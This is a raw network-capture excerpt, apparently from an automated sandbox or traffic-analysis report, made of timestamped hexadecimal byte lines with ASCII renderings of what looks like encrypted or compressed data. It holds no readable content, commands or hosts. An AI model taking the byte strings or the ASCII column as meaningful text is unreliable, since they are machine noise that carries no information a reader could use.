              2022-01-14 10:25:31 UTC61INData Raw: fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60 de aa 1e 44 13 fe 63 20 54 c7 4b 61 40 08 85 e0 bc eb 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95 c9 4f 68 b2 12 6a
              Data Ascii: fPlDug)c!OyaPYQ5fi.++<i2<qX;`Dc TKa@HGo35w7]UA/faQk:c-Pp}x Hhw`rIr|^Or)-./hr?Ohj
              2022-01-14 10:25:31 UTC63INData Raw: 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95 c9 4f 68 b2 12 6a bf 6e b0 14 6d 36 32 38 09 1e 55 5c d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23 de b2 15 f0 9d a3 b2 17 e8 93 dc ad 8d de ad 9a 56 de a9 b0 11 ff fc 73 05 0a 9f a9 a5 b0 07 15 ef 07 19 f2 6c ae 0a
              Data Ascii: aQk:c-Pp}x Hhw`rIr|^Or)-./hr?Ohjnm628U\5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#Vsl
              2022-01-14 10:25:31 UTC64INData Raw: a7 b0 15 ef ff cc 00 b3 68 f1 7a 60 74 99 20 99 af 8e 5e 26 84 74 77 ae 69 ce b7 e0 c7 bf c8 db 5c bf 0a 88 ca 0f f1 0f 18 63 ee 90 a5 14 72 0b 4e e4 60 8b 8a e1 5e dd ca 6f 3b 70 f5 24 c2 80 1d 48 44 10 14 f0 f8 76 e8 3f 4c f0 15 c8 a6 47 ec f7 6c cd 57 f8 48 9c 43 5c 13 c9 38 75 cb 9e c0 c7 fb e6 f4 9f 0f e4 71 3d 6a 97 5a db 59 fc 65 56 59 f8 13 20 fc 00 5c 53 0e b1 2b d9 3e b5 ff 06 ef 19 07 ce d0 27 0b e2 e2 48 1f 1e 22 cb 73 1e 9c 44 ec 84 3b 12 9b 72 f7 10 09 39 e2 5c af f4 93 65 38 7b 68 c9 58 03 c9 54 db fa c0 9b 14 ca 1f df 68 c2 36 1b 36 94 57 7a 59 32 ee 68 db f1 ca 69 be be fd a5 e3 7d e3 1c 03 bd fc 94 89 39 79 b2 cd 90 2b 59 5d 8c 72 f9 8a 07 4a 0d ec 6d e4 fa 87 f8 bf 77 6b 75 ca 26 54 3a 26 9f 8b 6c 83 1e 93 dc 53 14 ac e2 d4 dc 04 38 16
              Data Ascii: hz`t ^&twi\crN`^o;p$HDv?LGlWHC\8uq=jZYeVY \S+>'H"sD;r9\e8{hXTh66WzY2hi}9y+Y]rJmwku&T:&lS8
              2022-01-14 10:25:31 UTC65INData Raw: d8 d1 e6 57 c1 7f f5 f3 86 cc 78 67 a4 9b 64 ab 9d ab c5 e6 4d d6 2e 83 58 c3 7d 0b a2 a4 84 8e c7 e9 81 f1 12 78 50 98 21 01 ca 6a 36 34 36 36 c1 81 14 ba 24 85 cc c2 f6 6d 45 68 a1 dd 80 b9 57 53 7d 12 d4 32 c1 ed a6 e1 09 1d de be 84 73 07 6a 3e bc df 2f a7 ad 19 92 30 f6 ed c0 c2 f4 74 9b 34 ed ca ad 3c a1 99 de b1 91 6b 12 52 ca 7b b1 a2 22 5d 49 f3 ff ea ad 47 b1 bd 60 d4 c0 b4 db ef bf dc 78 87 f3 f7 e6 aa bb d1 f5 56 6e a2 2b a3 bc 1f 8c 28 22 ee 39 8f d2 d5 40 7f 99 bf 06 22 fc 7f e9 11 ff 0c cf 83 88 fb 21 c5 6b 3f 9d e3 ff 64 fe c8 65 25 d7 25 db b7 ef 61 c6 73 ac 01 1e 5b 5c 48 9c 52 2d 1c 9b d2 d6 a4 3c 8c 3b c4 df bd be 9f a5 bd 63 3b d1 0e e7 83 75 66 a7 bc f9 fa 8c 95 96 d8 7a fa 6f 32 3c 19 85 8c 9b 54 13 8c 70 96 45 b3 3c ab dc 1c d9 45
              Data Ascii: WxgdM.X}xP!j6466$mEhWS}2sj>/0t4<kR{"]IG`xVn+("9@"!k?de%%as[\HR-<;c;ufzo2<TpE<E
              2022-01-14 10:25:31 UTC67INData Raw: 12 11 5d e5 a5 9c 2d b8 0b e8 86 79 04 14 dd 03 1c 4a eb 8b e5 05 30 83 3f b6 0d e9 01 80 25 82 5b e9 d0 f6 7d 01 0f 0e f1 cd 42 92 93 d5 42 0d f1 0b 66 2f 16 c5 aa 1f cb 47 63 55 3a 7b 69 f0 4f 61 53 73 0c 45 df bf 2d 17 56 cc db 29 b5 7a 5e 4c f2 d6 73 0d f0 95 dc f4 a6 f8 b1 1d 64 a7 b9 62 b7 dd f9 78 c7 f7 47 78 83 eb 1b 02 ea eb dc 1b 1f ca cd 47 6a b1 77 ef 4b d6 0f 8e 43 91 da 17 79 ab cc 70 26 29 b4 17 f6 07 9a e9 fe f1 c0 90 41 90 5b 97 c1 7b 2c 99 08 e3 37 95 c7 8b dc 81 07 9f 00 e4 8a 66 a1 51 27 9e 3b 06 3b e9 00 82 70 1c 31 d0 77 8a d0 aa 11 e2 ab a8 e8 25 3c cc 66 38 0a 93 c4 c9 fd 41 d1 96 86 ec 9e 26 59 9b 29 53 09 aa da 3a 16 7a 98 f5 19 18 03 bc 3e 8a 7a 80 6e 5a 96 13 d1 da 07 98 47 72 90 ea 5d f3 2c ac d1 9b db 3d 9c 92 f4 e3 7d a7 14
              Data Ascii: ]-yJ0?%[}BBf/GcU:{iOaSsE-V)z^LsdbxGxGjwKCyp&)A[{,7fQ';;p1w%<f8A&Y)S:z>znZGr],=}
              2022-01-14 10:25:31 UTC68INData Raw: f5 f0 92 5f d1 c9 4e e9 00 84 93 fd b6 c2 73 d5 4e e5 09 12 48 eb 35 e9 bd c4 e3 2e 29 a2 0a 1c 5d 4f c1 dd 4e f5 f8 72 ec d8 65 16 cc 1f af 87 fb e7 fa 7b e4 34 81 45 13 f7 ee 93 25 b2 84 a8 85 3b e7 0a 8c 70 64 c3 67 c3 fa a9 c7 50 f0 97 1a 79 ed 00 06 3a 6e ac 03 01 5d 4b 63 cd c9 ef 79 19 fd f6 cc ce 7b 6c 0e bb a9 b3 84 7b a7 bb 25 73 b3 32 ae 07 15 e7 06 7c d1 08 59 e5 90 44 16 6f 5c a0 6b 80 ef c1 bd 7c 8f d6 ad 6f fb 57 f3 3a c4 f4 7b 0f 4f 69 04 7b ab 24 c2 fc 65 33 39 98 89 d9 ac ac d3 4c fc 76 53 c7 7a 37 30 e7 ac 16 75 06 15 1b a8 cb f1 c1 d5 4f 6a b7 81 a7 79 4e 7c 42 b2 0a 89 e2 f3 df 3a 0f 54 14 ad 85 e0 be fd 8b 91 99 1a 95 b5 90 4a e1 aa 11 14 1f 70 2c 52 e8 8d d7 c9 52 7d 38 b2 c3 2d ba ea 80 44 b6 bd 91 44 b2 41 9d a0 3c c0 05 3f d0 63
              Data Ascii: _NsNH5.)]ONre{4E%;pdgPy:n]Kcy{l{%s2|YDo\k|oW:{Oi{$e39LvSz70uOjyN|B:TJp,RR}8-DDA<?c
              2022-01-14 10:25:31 UTC69INData Raw: 68 d8 9e c3 e5 89 58 a5 a4 21 dd 9d 56 dc a1 1f 17 60 d2 ca d4 cf 79 0d 38 b0 d5 9b c5 7d 15 86 1f f7 43 18 dd f2 76 86 67 ed 00 79 73 88 ea 01 09 1d c4 0e 51 db 60 69 ed da a6 33 b7 41 1d d1 f5 55 95 14 64 bb 6b 5a 6c 04 b1 2b 09 c9 41 8b e6 aa 01 ff c1 c6 2b 72 8b fe 77 35 07 28 c3 cd e3 9f b8 15 f2 04 76 db 85 56 14 d1 56 c0 e2 05 72 1c f2 d0 02 26 57 41 9d 71 79 5d fd 4c 5a a7 b3 9f ad 88 7f b7 68 16 af e3 2c 25 d0 91 55 a9 b6 db 85 b0 08 86 70 c2 b4 cc c6 75 94 15 f6 64 a9 7a 45 1f c2 73 d5 1f df 3f 9a 1c 33 fe fa c0 5f 12 7d 18 7d 6e 94 7a 7b ae a7 f7 e8 97 c9 d1 28 41 81 51 af d9 26 54 d6 d6 01 26 10 d1 f6 2a 22 56 c2 0c 3c 31 4e 4d a7 e5 0c 70 8e 92 37 63 b9 ec 4a 7c 88 7c 96 b0 60 d7 6f b3 3b 42 0f ef 16 90 e8 e1 2b 20 e4 50 f6 6a bc fd 66 69 01
              Data Ascii: hX!V`y8}CvgysQ`i3AUdkZl+A+rw5(vVVr&WAqy]LZh,%UpudzEs?3_}}nz{(AQ&T&*"V<1NMp7cJ||`o;B+ Pjfi
              2022-01-14 10:25:31 UTC71INData Raw: ff 2b 9b c5 74 82 6b 84 eb 7a 40 36 20 49 77 16 06 9d 40 87 80 9a 1a 29 44 08 20 7e f6 c5 45 7f ee 8f cc 7c 1c 2e fa 4e ea 8e 4f 71 66 a3 4f f8 1a be b4 60 2b a3 00 ba 96 8f e6 89 f2 70 82 a7 37 fc db 0a 95 d2 d5 52 9f a4 db bf 1d 30 6a c3 8f db a5 91 bb c9 6b 35 a3 b7 89 4d fa 15 24 74 8a 78 95 cb 2b a6 c3 b1 f5 18 d5 2b 56 ca 45 59 34 99 e2 ba e6 9b d7 92 fc 0f 3e 22 53 75 03 16 00 9a fd 3e 7f e3 2d b5 82 83 af f5 9c fd 87 f0 83 ec 79 4a 9a 96 66 4d 2f d0 2e e4 f5 82 ef f6 1b c4 91 d4 c3 fa 50 86 93 f6 e4 94 3a d9 0c 76 8f c6 fa 9a 8b 03 04 30 15 ee 85 eb 06 5a f1 fe 53 cd 44 76 27 e6 85 e7 0e 64 57 2d 5e d6 73 2d b5 9e 21 d0 61 79 6a 23 ec 6c 92 c1 68 c4 26 60 cd 53 74 90 23 52 84 88 70 16 41 7a a0 fb ca cd 44 1c 5f bf 04 6b 3d 26 7d 06 9f a3 be 21 f6
              Data Ascii: +tkz@6 Iw@)D ~E|.NOqfO`+p7R0jk5M$tx++VEY4>"Su>-yJfM/.P:v0ZSDv'dW-^s-!ayj#lh&`St#RpAzD_k=&}!
              2022-01-14 10:25:31 UTC72INData Raw: 9b de b2 f5 73 b0 12 e4 89 9d 28 01 6d ea a2 39 82 7b 04 6e e7 ea 91 7b 21 a5 76 88 88 25 d8 7e a4 2e 27 c7 5c 2c 6c 41 9e 95 50 99 13 f6 9a 0a 81 52 f6 03 d2 fb f5 f8 6b 3e 83 21 3f 91 58 00 e5 e8 1a 44 e7 c2 e7 89 e5 70 2a 18 7c 86 62 a1 52 a3 31 b1 6a 26 49 d3 56 af 14 5d 54 ce c9 46 02 45 d2 d2 57 6e d7 9a 66 d2 4e d2 3e dc bd be cf 5b 51 69 31 49 a1 19 e2 31 03 74 47 43 67 e7 05 aa 1f ad 2d 82 6b 38 1c 45 f6 2e 9d b6 c0 44 6c 23 80 7f e1 e1 46 14 2d b8 7a 45 9a 53 73 17 13 fc c5 63 4c 51 45 6a b4 0c 7a 62 71 be f0 36 00 83 e5 1d da 24 6f 45 83 c3 c0 eb 70 57 72 9a 5d 54 c4 1e 13 1d d7 f3 c5 66 ab 81 ef 89 f1 ec c7 51 c7 41 f0 46 c1 65 22 4e f5 19 a2 c5 75 a2 0f f8 7a 90 45 a9 ac fd b7 8d 6b 1c 56 cf 52 ec eb ac 52 0a 87 62 af 15 5c 23 e3 b9 55 31 14
              Data Ascii: s(m9{n{!v%~.'\,lAPRk>!?XDp*|bR1j&IV]TFEWnfN>[Qi1I1tGCg-k8E.Dl#F-zESscLQEjzbq6$oEpWr]TfQAFe"NuzEkVRRb\#U1
              2022-01-14 10:25:31 UTC73INData Raw: 5b 4a ec 63 98 f5 83 f8 69 e7 84 1b 07 9f 50 a6 57 ad 63 21 d4 c5 61 f7 4a 64 c9 1e 2e e4 dc 67 2a 6a a7 54 80 a4 20 9f 78 09 05 6a f3 83 65 7e 59 4d 38 0a 60 94 db 25 0c a0 be fe 0a d9 4b ff bc 75 0c 24 50 09 47 f9 fa d8 6a 29 bb 02 c9 2e fd be 78 8a 36 3b 66 ea 4b 61 c1 e3 a0 2b d7 63 52 32 72 0b e8 c1 7a 6e e1 f2 6c 19 61 c9 41 f5 be 90 df 76 1a 41 d7 21 2b f0 14 79 c1 f4 61 8f c2 82 3e e0 79 38 d7 5f 54 97 70 74 87 61 bb 1c 84 b8 6b 6b f0 50 a7 7b 18 3a 92 c9 49 72 99 d9 c7 b9 fd e7 04 9f b0 d8 7e 82 1f 8b f8 a0 75 08 9c 74 fc dc 0a 22 16 7f 62 ac 61 59 31 51 00 88 77 04 8c 9c 29 3d 26 f6 07 1f 8c ca 3d d8 c4 69 8a 81 41 a3 4e 51 49 95 05 3c e4 26 7f 06 4e c4 ba 88 92 95 7a 79 14 71 60 38 da 97 af 39 29 9c 38 02 83 af 86 69 ce 50 64 53 70 9e 60 3d e7
              Data Ascii: [JciPWc!aJd.g*jT xje~YM8`%Ku$PGj).x6;fKa+cR2rznlaAvA!+ya>y8_TptakkP{:Ir~ut"baY1Qw)=&=iANQI<&Nzyq`89)8iPdSp`=
              2022-01-14 10:25:31 UTC75INData Raw: c2 0d 37 8e a0 f0 7e 74 52 4e 12 c7 c0 be 11 34 86 22 e6 54 53 72 89 fc b7 93 32 ea 48 ee 80 7e 6c 1a d3 50 ee 86 8b 5e 7b 57 ab 2e 8d 7d b4 e7 97 4b f3 e3 ce 0b 1a b3 32 c1 8c dd c5 cf f0 a5 f6 c3 d7 89 be 64 7f ca 15 ec 65 fe 4a 12 cd 6b 7b e0 1e 4b bb da a8 45 7e 91 dc 8c 22 50 e3 e9 b2 85 42 96 0e 6f 69 6c 46 cf 10 db de 44 5b 5e d7 39 e3 5b 43 e7 48 f9 e0 b9 ea e6 78 43 d7 26 43 9a 24 41 3f 41 80 60 24 ff d9 5b a1 08 97 2c c9 b1 4c f6 6c a1 9f e6 9e 22 38 fa 14 46 92 2b ba fd ad 97 cf 33 a7 31 f9 e1 38 fc db e6 79 b4 19 ee eb 45 1f 35 60 a3 43 4a e7 4b 07 fb 2d c5 1b be f0 9b 91 cf 56 97 d4 2c fe 81 8a 17 e9 32 6c bc f8 9b b8 7e 48 6f 92 04 94 2f 40 8a 97 bc f0 9d c1 71 bc b9 71 1a e8 34 58 11 50 2a 58 d1 5c cc 92 22 1d c5 80 95 5d 40 15 f4 08 f0 2a
              Data Ascii: 7~tRN4"TSr2H~lP^{W.}K2deJk{KE~"PBoilFD[^9[CHxC&C$A?A`$[,Ll"8F+318yE5`CJK-V,2l~Ho/@qq4XP*X\"]@*
              2022-01-14 10:25:31 UTC76INData Raw: df a8 49 9a 8b 8f 3b 93 26 f8 04 ee 69 b5 aa 1f c3 75 da a4 6b 5e 01 ba 85 93 d3 44 1e 14 0c df 9d b7 fa 68 bf 6e b9 67 33 2c 9f ec cb ff 1d 34 eb 7a 95 df 5d 3c bd b1 ea fe 77 0e 7e 9a 40 14 68 de a4 31 a2 d5 f7 87 95 d1 4c 70 82 76 95 c9 9f 22 22 aa a8 3e 6a b8 00 cb 17 4f 96 f0 0f 24 0e 50 da 42 33 da 4e f0 f6 8e 16 07 5f fb 92 48 e7 7e 80 6b c3 76 8a 20 2f f1 1a 12 6c d3 4d eb d9 2a 37 64 08 00 f4 76 88 1a 2d b1 8d 65 36 27 9c 39 d4 b3 6a 5c 4a 90 5a d4 b0 71 07 71 06 88 6b 98 ee 18 c2 f0 87 ef 1c 18 26 db 73 f1 d3 72 a7 04 fc c2 c9 3b 63 35 14 74 2c 33 a7 bb 01 e1 64 cf 89 e8 ff 24 b4 16 7b 12 be eb 0e 60 d7 25 a2 f8 95 d2 da af d0 c1 63 21 db ce 7c 19 f9 f8 78 d4 c1 00 3d 5e 62 b5 96 5a d4 c0 ce 8f dc b1 65 f5 96 2a 44 f9 1f 7e 9d b2 00 f7 fd 50 a7
              Data Ascii: I;&iuk^Dhng3,4z]<w~@h1Lpv"">jO$PB3N_H~kv /lM*7dv-e6'9j\JZqqk&sr;c5t,3d${`%c!|x=^bZe*D~P
              2022-01-14 10:25:31 UTC77INData Raw: 53 72 9f b5 f9 00 60 e4 95 de b3 ef 4a 0e 86 51 71 08 8d da cd 13 e3 30 cf 1a 37 cc d3 02 82 83 40 0d f1 0c 6f 5c a4 33 00 e1 33 b0 45 69 7b 1f 3b 76 a0 3f 9a 59 2e 4d 6c 5e be ef 1c a9 51 76 82 62 b0 70 85 16 3b 91 c7 c4 b5 98 5d 55 16 01 40 0b b2 e1 c4 24 55 47 67 2f b1 6e 18 78 9a 2d 1c 6b aa b9 c9 25 2d 76 8d cf 53 72 e1 24 1c 0f e9 0a 69 c2 2b a4 31 b9 72 5f e9 0c 0a 8d ba a5 ac 0b a8 31 51 1e 5b 29 56 63 36 35 a0 22 3d 87 45 3a 0d ea c2 ee c6 95 25 24 48 f4 79 1f ab f5 18 82 ac 7b 1e 50 18 cd da d4 c5 61 5e c8 dc be f1 b3 1e 8e ec 24 1b 55 a9 4c cd 54 cd 43 f9 0d 36 24 41 90 4d 09 7e 8b f1 45 6d 33 49 92 6f 30 22 5e 0b 6c ce 59 9c b3 f4 67 21 c9 47 74 90 1f 9f 61 d6 fd 12 52 b8 a7 f6 f2 a0 67 d1 68 fa fa 84 52 57 d0 4a 1d 4d f2 5e 99 15 d8 c5 98 5c
              Data Ascii: Sr`JQq07@o\33Ei{;v?Y.Ml^Qvbp;]U@$UGg/nx-k%-vSr$i+1r_1Q[)Vc65"=E:%$Hy{Pa^$ULTC6$AM~Em3Io0"^lYg!GtaRghRWJM^\
              2022-01-14 10:25:31 UTC79INData Raw: 21 dd 4e fe 65 45 71 05 49 70 78 6a e1 2d ab 8f a3 54 2a 35 bd 6a ac 7b 1e 63 44 07 10 f1 9d d2 23 31 fc 79 19 f6 15 0f 1b d0 d8 ad 92 2a 9f 08 c3 75 0e 63 e6 89 9d b3 2d 7e db 27 cc c5 ba e4 82 6a 52 25 9a 4a e2 b0 ee 3a 5e c6 e9 18 6f c2 9b de a2 d3 fb 8d 94 53 1e b2 e2 b5 98 4e e2 d1 43 6c dd 35 a2 7d 16 98 2c c6 9c cc 67 22 55 55 4c 97 c7 8d a0 39 89 06 49 19 2e 9b 79 7d fb 04 8a 6c a2 3c 69 3a 04 fb f9 ed f1 ce 05 03 0c 75 1d 67 9a 49 09 02 89 b5 96 4f 21 7c 75 eb 02 9d af 8b a8 38 7a 92 04 f2 64 be 63 92 2e c0 0a 30 33 b8 16 03 e5 a3 66 ba ef 0e 80 bb c2 ea 99 cf a4 ee 38 08 9f a7 47 c5 75 0c 73 0f 83 a0 2d e6 83 a1 af c5 6e ea 9f e1 30 d1 b5 8d c0 e6 90 2a c4 1d c0 f9 e3 28 42 50 e2 de 0f 31 67 3d 8e 40 19 e6 86 6a 03 d1 51 6b 27 cd e0 bc eb 1a 50
              Data Ascii: !NeEqIpxj-T*5j{cD#1y*uc-~'jR%J:^oSNCl5},g"UUL9I.y}l<i:ugIO!|u8zdc.03f8Gus-n0*(BP1g=@jQk'P
              2022-01-14 10:25:31 UTC80INData Raw: c3 61 52 e0 c4 83 ed 78 47 7d 18 e2 3b 55 0e 62 47 ba 6d 5f b7 66 e6 80 62 a8 47 6f ff 87 ee 93 9e 3b 75 ae 05 6a 55 b6 5b 53 73 00 ea 95 91 aa 08 87 08 67 64 a9 b7 94 2c 4d 6f c4 f1 03 03 4f 69 d3 81 ce a9 59 be b9 78 9e 2f d1 57 92 28 3a 0d 13 05 43 89 f6 6a dd 4f 6c 21 c5 78 91 2a 8c 2b a2 25 d6 e1 3f 8c 7c 94 2c 35 b0 d1 45 61 13 f8 28 38 e6 77 44 09 1d c7 26 31 a7 00 59 55 4a 3a b0 a9 f6 6d df 5a 77 65 dd 99 94 4b 71 02 eb 0c 69 55 5e c2 b9 6b cb e9 ee e7 fe 8a 20 42 04 86 16 66 a0 53 71 00 70 2e 79 07 13 f2 10 11 eb 89 e6 92 43 de a2 c3 ab bb 15 0b 17 b5 8c 75 03 76 92 7b 63 20 42 ed c3 33 b8 1b c9 28 4d 7a 9c 31 a2 24 b7 61 13 f9 e3 3c 5c dd 23 cd 48 86 72 1b 1a 51 63 73 0d 06 69 79 0e 6e af e2 c4 fe 4d fa 7c 9b 29 0f b9 65 25 db f2 d0 0d 9d b1 09
              Data Ascii: aRxG};UbGm_fbGo;ujU[Ssgd,MoOiYx/W(:CjOl!x*+%?|,5Ea(8wD&1YUJ:mZweKqiU^k BfSqp.yCuv{c B3(Mz1$a<\#HrQcsiynM|)e%
              2022-01-14 10:25:31 UTC82INData Raw: 1d 1f c4 04 f0 d5 3a 15 24 21 aa e3 91 bf 65 0f 0f 34 4c 02 22 46 9f 4c 0e 03 74 81 f4 89 06 b0 60 dc ad e2 fb f2 7b f9 e8 8d bb 6b 08 39 34 70 e5 f3 40 15 07 ba e1 c0 98 a6 49 ce 8c 1c 24 55 6f e5 83 b4 6b cd 91 dc 57 21 32 4f 18 03 08 ab 68 0d f7 4a 6c ee ef e7 72 7e f6 09 63 23 ea 7b b2 1b 27 be 1d b7 f7 8d ce f2 87 44 5e bd 6d 3f ca 99 26 6b 64 1d 18 db 07 03 fc 32 da 4a 79 8d 60 a7 44 10 be fe 09 1b db 2b d3 b8 48 87 3f 1f 60 78 94 33 a5 ae 79 8b 45 63 31 a9 c7 07 5d 5f 40 11 f1 60 24 ab 8d d6 af 86 16 3f 64 71 04 93 c4 ed 1e f5 46 fe 7e 7c c2 8b 06 18 b9 81 ea 87 a2 35 cf 88 77 05 11 55 3b 71 fc 7f eb 19 f6 30 52 e0 d1 8b eb 12 98 f4 72 94 4b 79 6f 2b a4 98 59 48 5e 9c 20 4f 6c 4f c4 e4 64 bb 68 fb a8 dc 50 26 51 7d 1c 57 4d 58 1d cd 4d a8 80 fd f9
              Data Ascii: :$!e4L"FLt`{k94p@I$UokW!2OhJlr~c#{'D^m?&kd2Jy`D+H?`x3yEc1]_@`$?dqF~|5wU;q0RrKyo+YH^ OlOdhP&Q}WMXM
              2022-01-14 10:25:31 UTC83INData Raw: 36 56 db 33 ef 9e f5 ff 74 47 ee ca 9e d9 88 63 d8 07 0f 1e e9 0e 0a 65 f9 91 a2 ce 41 8c f0 40 98 fc 66 b1 8a 6e cc e2 bf 66 7d aa 6a 1e f7 b0 7f b2 ee 4b 78 f5 1b a6 bf 1e 08 d0 8e 10 2d ed 51 14 34 2e 13 17 71 4f 09 18 64 fb ae 42 e4 ae 55 cd 57 e4 cb 3d f8 75 77 f1 0a 6a 11 88 92 eb 3c 08 93 c4 50 48 ac 75 d3 e6 d0 a6 36 39 8c 35 dd 4c e7 b5 92 4d 7d c4 47 6a fc cf 30 44 d9 31 3f 7b 5a 03 3d 69 cd 65 53 83 f9 4d 61 b8 19 f1 1a a1 73 7d ed b1 eb 6a 73 29 c0 a8 35 ad 9e 20 b5 07 5c d1 5b 5b 9a 72 f8 07 e1 75 26 bb c2 c9 cb ed f9 96 44 19 e6 6d 67 a5 4a aa 83 14 31 3e ec d6 27 2b f3 58 90 b5 66 fd f9 ea 91 dc 3c d5 5b 4c 0a dc d7 da 78 b4 76 61 20 ac 65 74 90 41 89 ef ff 53 1c 2e 4a e2 f7 90 4d 6d a6 84 09 c2 45 14 95 c3 78 9c 2f 46 37 7e fc 7c 87 b9 2f
              Data Ascii: 6V3tGceA@fnf}jKx-Q4.qOdBUW=uwj<PHu695LM}Gj0D1?{Z=ieSMas}js)5 \[[ru&DmgJ1>'+Xf<[Lxva etAS.JMmEx/F7~|/
              2022-01-14 10:25:31 UTC84INData Raw: 1a 44 ba 56 ab d2 d2 a6 2d b3 83 84 0f f0 86 dc 15 fb 83 0a 7d eb 05 04 98 33 b0 6d 27 c7 51 86 14 9a 21 cd ae 92 4c f4 37 8d b5 92 48 17 5a 2c 39 85 eb 61 ae d7 d5 38 01 79 84 6c b4 e6 fa 9b ad 87 dc 39 9c 38 fc d8 c6 18 d2 2e 45 29 8e 44 05 19 82 63 ea 01 07 16 a1 20 8d 34 13 a2 93 ae ed 10 b7 9c 4f 72 85 fe 00 e9 92 7e d1 53 77 0e 60 33 62 a2 27 c9 49 0e 08 6a 45 6a ae 18 68 ab 19 20 4a e5 41 99 c3 71 12 8a 8d cd 5a dd 3d fb 90 bf 9e 2a 27 ca d5 44 7f 33 a6 28 3b 29 68 ab 9e 58 ab 9b 82 ac 06 97 29 d3 cb 2c da 76 9f bd 77 0a e6 81 96 8f db 2f 4d 9f a4 24 57 4e 9f b3 30 9d a1 a6 57 bc 03 1c 40 1b cb b6 b8 13 92 b3 3c 1e 55 49 6c c8 c5 e1 95 cb 53 8a 3b e0 6c 07 84 88 89 fe 6f 37 84 0c 30 a4 59 58 5b 61 5d 4c 27 60 ab fd fd 53 58 ce d3 81 59 29 7a 2b e0
              Data Ascii: DV-}3m'Q!L7HZ,9a8yl98.E)Dc 4Or~Sw`3b'IjEjh JAqZ=*'D3(;)hX),vw/M$WN0W@<UIlS;lo70YX[a]L'`SXY)z+
              2022-01-14 10:25:31 UTC86INData Raw: 7c 4d 0a 44 71 c6 16 05 78 41 40 8d 6d 46 55 5b 59 05 8f 53 99 5e d8 2e 0b b7 c5 7e 04 c0 0a b4 fc 25 2b 4b e1 1f 45 4e 26 f1 ea f9 8f 69 1c 62 a1 47 00 75 d6 4c 33 c4 43 84 85 74 f1 ac 94 92 26 98 f5 ff 08 84 52 39 a0 2f 86 af 0c dc b0 6e d9 ba 6d 5f 8b 53 7f ee 37 26 4c a7 14 91 30 b6 4a 31 63 37 7f e1 02 be a1 63 32 33 99 cf 5c 2c 52 82 0e 01 09 37 5f c0 85 25 df f2 d8 c8 63 da c4 3f 00 8b 01 3a fb c0 2b 51 0c 9a 72 5c 59 9e 82 d2 e8 c2 0b 36 4b 7f b3 28 97 1d d9 5b 6b b2 15 ae 1e e4 71 7d 25 96 b1 a8 89 42 3d df ec 62 28 79 78 54 21 c2 68 a4 3b d3 84 41 36 80 2b 86 b0 b4 cf f4 02 4f aa aa ac a9 6a ce db 1b 27 e4 36 ce d5 f7 e4 a3 45 a3 fc e3 cb 97 dc c7 2b 4a 70 f0 df 99 1e fa 2e c3 fe 18 11 0c 50 61 0e ca 71 29 0b 57 0f bd 25 d5 dc c7 8d 21 90 b8 ab
              Data Ascii: |MDqxA@mFU[YS^.~%+KEN&ibGuL3Ct&R9/nm_S7&L0J1c7c23\,R7_%c?:+Qr\Y6K([kq}%B=b(yxT!h;A6+Oj'6E+Jp.Paq)W%!
              2022-01-14 10:25:31 UTC87INData Raw: 13 0e 30 57 99 ca 9b c2 69 81 bf 29 2f f0 6b f7 82 31 ae 5f 5a a7 be e5 5b 41 9f b0 1c 0d e6 db aa 02 8b e0 bf 6b b9 c6 8e 48 e4 8d ca d4 50 62 aa 10 b4 a2 43 60 c7 95 61 1b 9b 29 b4 ef cf 36 c2 88 24 4e 96 27 8d de e1 3d 0a ec 82 61 f7 56 ad 56 c2 f0 96 e4 cc 17 18 75 4f 79 ca c2 ea 6b 59 2c 58 aa 60 94 49 9d c7 5f 5d ab 2c 54 8e 54 c8 c9 42 03 0d ae 07 6c ad 85 9d f6 72 c1 c3 63 26 52 f6 6a 53 dc c3 77 64 6c af 96 85 6d fe 82 7d b3 2a 78 25 89 36 b3 d5 1e 8a a2 a9 71 9e c2 87 bb 63 8f c6 fc 8f 69 42 7e f6 05 4d 72 2d c8 db 31 6c 3c 66 fb 45 76 95 c8 cc c2 6f 8f 92 15 36 ce d7 d6 01 70 72 21 aa 56 39 58 cd f2 73 1c 57 4a be ac 89 10 0b 80 88 b0 0b 8c 34 58 32 33 6a af e4 e3 cf 16 1d 05 2f f4 f2 7b 1b d9 4a 50 55 46 a2 32 5c d7 97 79 0d 71 00 c2 f7 59 ee
              Data Ascii: 0Wi)/k1_Z[AkHPbC`a)6$N'=aVVuOykY,X`I_],TTBlrc&RjSwdlm}*x%6qciB~Mr-1l<fEvo6pr!V9XsWJ4X23j/{JPUF2\yqY
